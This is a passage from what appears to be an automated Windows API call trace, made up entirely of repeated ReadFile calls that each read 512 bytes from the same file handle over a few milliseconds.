lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.658] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.658] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.658] ReadFile 
(in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.658] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.658] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.658] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.658] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.659] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.659] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.659] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.659] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 
[0146.659] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.659] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.659] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.659] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.659] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.660] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.660] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.660] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.660] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, 
lpOverlapped=0x0) returned 1 [0146.660] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.660] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.660] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.660] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.660] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.660] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.660] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.661] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.661] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, 
lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.661] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.661] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.661] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.661] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.661] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.661] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.661] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.661] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.662] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: 
lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.662] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.662] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.662] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.662] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.662] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.662] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.662] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.662] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.662] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, 
lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.662] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.663] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.663] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.663] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.663] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.663] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.663] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.663] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.663] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.663] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.664] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.664] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.664] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.664] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.664] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.664] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.664] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.664] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.664] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.664] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.669] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.669] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.669] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.669] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.669] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.669] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.669] ReadFile (in: hFile=0x58, 
lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.669] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.670] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.670] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.670] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.670] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.670] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.670] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.670] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.670] ReadFile 
(in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.670] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.670] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.670] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.671] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.671] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.671] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.671] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.671] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 
[0146.671] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.671] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.671] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.671] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.671] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.672] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.672] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.672] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.672] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, 
